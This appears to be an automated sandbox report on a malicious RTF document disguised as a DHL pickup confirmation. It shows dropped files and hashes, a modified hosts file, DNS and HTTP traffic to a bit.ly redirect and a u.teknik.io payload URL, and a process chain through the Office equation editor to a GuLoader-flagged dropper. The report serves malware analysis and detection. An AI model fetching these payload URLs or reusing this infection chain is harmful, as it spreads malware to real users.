Preview:	L..................F.... ...6.2..{..6.2..{..................................!....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....YR0} .DHL_DE~1.DOC..........Q.y.Q.y...8.....................D.H.L._. .D.E.L.I.V.E.R.Y._. .P.I.C.K.U.P. ._.C.O.N.F.I.R.M.A.T.I.O.N._.C.B.J.2.0.0.6.1.8.0.9.2.9.0.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\648351\Users.user\Desktop\DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.doc.N.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.H.L._. .D.E.L.I.V.E.R.Y._. .P.I.C.K.U.P. ._.C.O.N.F.I.R.M.A.T.I.O.N._.C.B.J.2.0.0.6.1.8.0.9.2.9.0.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	191
Entropy (8bit):	4.9693898750437935
Encrypted:	false
SSDEEP:	3:M17pusszg3R1saANW6C8cMVUpS5ebsszg3R1saANW6C8cMVUpSmX17pusszg3R1S:M3xT3RAN5CiNT3RAN5CFxT3RAN5CC
MD5:	2DA96FA1C83BD5FD78A742EE07A6EE60
SHA1:	9B31905A5C00240F91A1BBB92603AA807CDB91BF
SHA-256:	FD4766193CB8071A6E56B44A635C53992F50AEA3CB874298FCA6DF70F96C8AB8
SHA-512:	5B4197F33B4BF9DDAF28DA898016141FD67CA7135782E8C48753FC459E10FF7A8424EB16C0F7FACD6A622512CF907E0EFE1E06B7C23190B1737BAB45B214A8A4
Malicious:	false
Preview:	[doc]..DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.LNK=0..DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.LNK=0..[doc]..DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIX8D795.txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	89
Entropy (8bit):	4.321009057274464
Encrypted:	false
SSDEEP:	3:jv6EVTV+wLJci2SCvnTQ0ZXU/V6WVQQ/Xn:V5LJci2zcxEWVQsX
MD5:	64A36BD1ED7DE750FB5D90B3C300C45C
SHA1:	FE089E9DB7F488D4F8E88574DB0BEB7830E4C51F
SHA-256:	8D8F8D068D6834BE77EAA3780658325EA7CED193D55AB4CF920A71352705FED0
SHA-512:	84C699AA73140DE219384677863A3A9AFFA12628741AAB964AAD5A9E23903AFE18DD5644B94FD94D68946065D44763953A1C4D736DFB876A853603F8B25D2D8F
Malicious:	false
IE Cache URL:	bit.ly/
Preview:	_bit.l1p6Fu-b3e40a06d0f0fee6b7-003.bit.ly/.1536.302713088.30906547.4172118305.30870412.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\O0MLNDW9.txt Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	64
Entropy (8bit):	4.069298633552528
Encrypted:	false
SSDEEP:	3:vpqMLJUQ2dNSKvdvWVQVyoPv:vEMWXdz82lv
MD5:	91EBFAEFED81515DCE79EA625941CFC9
SHA1:	DEA491BDD811EC15305E5DF665ACA4F95BE9E5CD
SHA-256:	D32FFF795B17587C661552502AEBA15951958D5CDAB2FA0B38676501088F7CB3
SHA-512:	FFACB7865C6950972DE9AB1F66CFA61D05CCE4F0FD7A46866869E31ED3B3C8C8025B96FF89699AE1D1929590E075BF2CC10246BA40E51947E80FDE70D8D77E83
Malicious:	false
IE Cache URL:	live.com/
Preview:	wla42..live.com/.1536.2974548480.30871745.2897817158.30870413.*.

C:\Users\user\Desktop\~$L_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\subfolder1\filename1.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	4.850477304732314
Encrypted:	false
SSDEEP:	3072:0wVUPE99xL9eKvb1HIFb5JjS0TqiAoQqwV:0wVUPEfDewb1HIFb5JjSyqiNQqwV
MD5:	8181B7DAAD3D822BE5A16DD3CB6F9065
SHA1:	1A52DF36955ADDF3EA3DEC85AD89F13AC267CC48
SHA-256:	936AF5883F7175DD1B3EC862E66ACB7B6670154FC7B5F93DABD4B9788F2279D1
SHA-512:	41F93D0AC3F4DD9FE4B88C2AA308A08AA79D4DD624B04D21E68B25A6B0CB39E429F61ED22E599AD24B3B396F05EF1A6E9E3DD121A02618FFA6BD811982CCC994
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 27%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L....=.T.................P...................`....@..........................................................................U..(....p.....................................................................(... ....................................text....I.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\69577.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	131072
Entropy (8bit):	4.850477304732314
Encrypted:	false
SSDEEP:	3072:0wVUPE99xL9eKvb1HIFb5JjS0TqiAoQqwV:0wVUPEfDewb1HIFb5JjSyqiNQqwV
MD5:	8181B7DAAD3D822BE5A16DD3CB6F9065
SHA1:	1A52DF36955ADDF3EA3DEC85AD89F13AC267CC48
SHA-256:	936AF5883F7175DD1B3EC862E66ACB7B6670154FC7B5F93DABD4B9788F2279D1
SHA-512:	41F93D0AC3F4DD9FE4B88C2AA308A08AA79D4DD624B04D21E68B25A6B0CB39E429F61ED22E599AD24B3B396F05EF1A6E9E3DD121A02618FFA6BD811982CCC994
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 27%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L....=.T.................P...................`....@..........................................................................U..(....p.....................................................................(... ....................................text....I.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\drivers\etc\hosts Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	11
Entropy (8bit):	2.663532754804255
Encrypted:	false
SSDEEP:	3:iLE:iLE
MD5:	B24D295C1F84ECBFB566103374FB91C5
SHA1:	6A750D3F8B45C240637332071D34B403FA1FF55A
SHA-256:	4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
SHA-512:	9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
Malicious:	true
Preview:	..127.0.0.1

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	6.301286257089436
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.doc
File size:	1410843
MD5:	3564ae31fbd0417674e60e71cb1b0f10
SHA1:	845e9c3d36ded3de8a57c6c81c7318577b851626
SHA256:	fb678c5c0e9dfb294c67907f2d195ab7a5046458e00983e74319b272de7f06b4
SHA512:	c9872f51d251a94bb1733f9596fc1edffd253a21ec864a7fea7c33211a1efa49bc9e2069284fa13692bc4c54ca94c38baaaa2938d6c7e6cc0254df7167c9e89f
SSDEEP:	6144:2Qw6QQw6QQw6QQw6QQw6QQw6QQw6QQw6QQw6QQw6QQw6QQw6QQw6QQw6QQw6QQwL:2RRRRRRRRRRRRRRRRRRRRRRRRm5Sm56
File Content Preview:	{\rtf33843\page51787859448176035@m42JEUa4SrclZjjE@-KI2WTYrCCIYwauZ0C<eh&&7_M-C_D--_-V,64>88964$Cv>yt=n6\|:%_>jn8%bm\mklP;=u\k6588.14.... .... ...... .... .... ....

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	0014FC54h								no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2021 07:41:30.152272940 CET	49165	80	192.168.2.22	67.199.248.11
Feb 25, 2021 07:41:30.200640917 CET	80	49165	67.199.248.11	192.168.2.22
Feb 25, 2021 07:41:30.200722933 CET	49165	80	192.168.2.22	67.199.248.11
Feb 25, 2021 07:41:30.201105118 CET	49165	80	192.168.2.22	67.199.248.11
Feb 25, 2021 07:41:30.251463890 CET	80	49165	67.199.248.11	192.168.2.22
Feb 25, 2021 07:41:30.353441954 CET	80	49165	67.199.248.11	192.168.2.22
Feb 25, 2021 07:41:30.353497982 CET	49165	80	192.168.2.22	67.199.248.11
Feb 25, 2021 07:41:30.508707047 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:30.561259031 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:30.561508894 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:30.576188087 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:30.631321907 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:30.631350994 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:30.631477118 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:30.645488024 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:30.700345039 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:30.700582027 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.317787886 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.395028114 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.501518965 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.501549959 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.501874924 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.502224922 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.502247095 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.502259970 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.502404928 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.502966881 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.503048897 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.503154039 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.503170967 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.503374100 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.503505945 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.503526926 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.503542900 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.503556013 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.503597021 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.503621101 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.504232883 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.504265070 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.504312992 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.504333973 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.509702921 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.554711103 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.554737091 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.554877996 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.554927111 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.555157900 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.555176973 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.555196047 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.555212975 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.555237055 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.555246115 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.555253983 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.555268049 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.555274010 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.555303097 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.555762053 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.555777073 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.555855036 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.556449890 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.556473017 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.556488037 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.556499004 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.556510925 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.556540012 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.556551933 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.556557894 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.556559086 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.556581020 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.556590080 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.556602001 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.556605101 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.556680918 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.556699038 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.556807041 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.556869030 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.556874990 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.556929111 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.557112932 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.557132959 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.557168961 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.557184935 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.557468891 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.607876062 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.607903957 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.607985973 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.608005047 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.608062983 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.608112097 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.608119965 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.608124971 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.608360052 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.608383894 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.608402014 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.608428955 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.608439922 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.608452082 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.608457088 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:41:32.608485937 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:41:32.608501911 CET	49166	443	192.168.2.22	5.79.72.163

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2021 07:41:30.034282923 CET	52197	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:41:30.082932949 CET	53	52197	8.8.8.8	192.168.2.22
Feb 25, 2021 07:41:30.083169937 CET	52197	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:41:30.131757975 CET	53	52197	8.8.8.8	192.168.2.22
Feb 25, 2021 07:41:30.382935047 CET	53099	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:41:30.443042040 CET	53	53099	8.8.8.8	192.168.2.22
Feb 25, 2021 07:41:30.443392038 CET	53099	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:41:30.507489920 CET	53	53099	8.8.8.8	192.168.2.22
Feb 25, 2021 07:41:30.980267048 CET	52838	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:41:31.030368090 CET	53	52838	8.8.8.8	192.168.2.22
Feb 25, 2021 07:41:31.036669970 CET	61200	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:41:31.086930990 CET	53	61200	8.8.8.8	192.168.2.22
Feb 25, 2021 07:41:31.608153105 CET	49548	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:41:31.660499096 CET	53	49548	8.8.8.8	192.168.2.22
Feb 25, 2021 07:41:31.668102026 CET	55627	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:41:31.729666948 CET	53	55627	8.8.8.8	192.168.2.22
Feb 25, 2021 07:43:31.575843096 CET	56009	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:43:31.627712011 CET	53	56009	8.8.8.8	192.168.2.22
Feb 25, 2021 07:43:32.776906967 CET	61865	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:43:32.898302078 CET	53	61865	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 25, 2021 07:41:30.034282923 CET	192.168.2.22	8.8.8.8	0x80ac	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Feb 25, 2021 07:41:30.083169937 CET	192.168.2.22	8.8.8.8	0x80ac	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Feb 25, 2021 07:41:30.382935047 CET	192.168.2.22	8.8.8.8	0xd577	Standard query (0)	u.teknik.io	A (IP address)	IN (0x0001)
Feb 25, 2021 07:41:30.443392038 CET	192.168.2.22	8.8.8.8	0xd577	Standard query (0)	u.teknik.io	A (IP address)	IN (0x0001)
Feb 25, 2021 07:43:31.575843096 CET	192.168.2.22	8.8.8.8	0xa869	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Feb 25, 2021 07:43:32.776906967 CET	192.168.2.22	8.8.8.8	0xd051	Standard query (0)	1ae2wq.bl.files.1drv.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 25, 2021 07:41:30.082932949 CET	8.8.8.8	192.168.2.22	0x80ac	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)
Feb 25, 2021 07:41:30.082932949 CET	8.8.8.8	192.168.2.22	0x80ac	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)
Feb 25, 2021 07:41:30.131757975 CET	8.8.8.8	192.168.2.22	0x80ac	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)
Feb 25, 2021 07:41:30.131757975 CET	8.8.8.8	192.168.2.22	0x80ac	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)
Feb 25, 2021 07:41:30.443042040 CET	8.8.8.8	192.168.2.22	0xd577	No error (0)	u.teknik.io	teknik.io		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 07:41:30.443042040 CET	8.8.8.8	192.168.2.22	0xd577	No error (0)	teknik.io		5.79.72.163	A (IP address)	IN (0x0001)
Feb 25, 2021 07:41:30.507489920 CET	8.8.8.8	192.168.2.22	0xd577	No error (0)	u.teknik.io	teknik.io		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 07:41:30.507489920 CET	8.8.8.8	192.168.2.22	0xd577	No error (0)	teknik.io		5.79.72.163	A (IP address)	IN (0x0001)
Feb 25, 2021 07:43:31.627712011 CET	8.8.8.8	192.168.2.22	0xa869	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 07:43:32.898302078 CET	8.8.8.8	192.168.2.22	0xd051	No error (0)	1ae2wq.bl.files.1drv.com	bl-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 07:43:32.898302078 CET	8.8.8.8	192.168.2.22	0xd051	No error (0)	bl-files.fe.1drv.com	odc-bl-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

bit.ly

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	67.199.248.11	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 25, 2021 07:41:30.201105118 CET	0	OUT	GET /2NYVK6q HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: bit.ly Connection: Keep-Alive
Feb 25, 2021 07:41:30.353441954 CET	1	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 25 Feb 2021 06:41:30 GMT Content-Type: text/html; charset=utf-8 Content-Length: 116 Cache-Control: private, max-age=90 Location: https://u.teknik.io/WLjtp.txt Set-Cookie: _bit=l1p6Fu-b3e40a06d0f0fee6b7-003; Domain=bit.ly; Expires=Tue, 24 Aug 2021 06:41:30 GMT Via: 1.1 google Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 74 65 6b 6e 69 6b 2e 69 6f 2f 57 4c 6a 74 70 2e 74 78 74 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://u.teknik.io/WLjtp.txt">moved here</a></body></html>

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2368 Parent PID: 584

General

Start time:	07:41:30
Start date:	25/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f070000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 1320 Parent PID: 584

General

Start time:	07:41:32
Start date:	25/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 69577.exe PID: 2416 Parent PID: 1320

General

Start time:	07:41:35
Start date:	25/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\69577.exe
Imagebase:	0x400000
File size:	131072 bytes
MD5 hash:	8181B7DAAD3D822BE5A16DD3CB6F9065
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 27%, ReversingLabs
Reputation:	low

Analysis Process: RegAsm.exe PID: 1796 Parent PID: 2416

General

Start time:	07:43:30
Start date:	25/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\69577.exe
Imagebase:	0xbb0000
File size:	53248 bytes
MD5 hash:	246BB0F8D68A463FD17C235DEB5491C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000006.00000002.2361430773.0000000000092000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: filename1.exe PID: 2104 Parent PID: 1388

General

Start time:	07:43:43
Start date:	25/02/2021
Path:	C:\Users\user\subfolder1\filename1.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\subfolder1\filename1.exe'
Imagebase:	0x400000
File size:	131072 bytes
MD5 hash:	8181B7DAAD3D822BE5A16DD3CB6F9065
Has elevated privileges:	true
